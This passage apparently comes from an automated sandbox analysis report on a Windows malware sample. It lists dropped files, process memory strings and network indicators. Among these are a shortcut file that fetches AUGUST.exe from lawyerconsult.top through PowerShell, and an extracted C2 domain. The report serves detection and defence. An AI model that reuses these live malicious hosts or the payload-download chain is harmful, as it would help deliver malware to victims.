Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

Source:	Binary string: msacm32.pdbUGP source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
Source:	Binary string: msacm32.pdb source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
Source:	Binary string: wntdll.pdbUGP source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: hello.exe, 0000000B.00000003.1378606402.0000000002751000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmp, DZIPR.exe, 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000017.00000002.1825706075.0000000070128000.00000002.00000001.01000000.00000009.sdmp, DZIPR.dll.11.dr

Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	11_2_0040301A
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	11_2_00402B79
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE2748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	12_2_6FE2748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C91748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	13_2_6C91748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	19_2_6FEA748E

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: fullimmersion777.com

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VOXILITYGB VOXILITYGB

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: lawyerconsult.topConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: lawyerconsult.topConnection: Keep-Alive

Source: DZIPR.exe.12.dr

Source: global traffic	DNS traffic detected: DNS query: lawyerconsult.top
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa

Source: DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c0rl.m%L
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: edb.log.18.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: MdkbG2pK4l.lnk	String found in binary or memory: http://lawyerconsult.top/AUGUST.exe
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 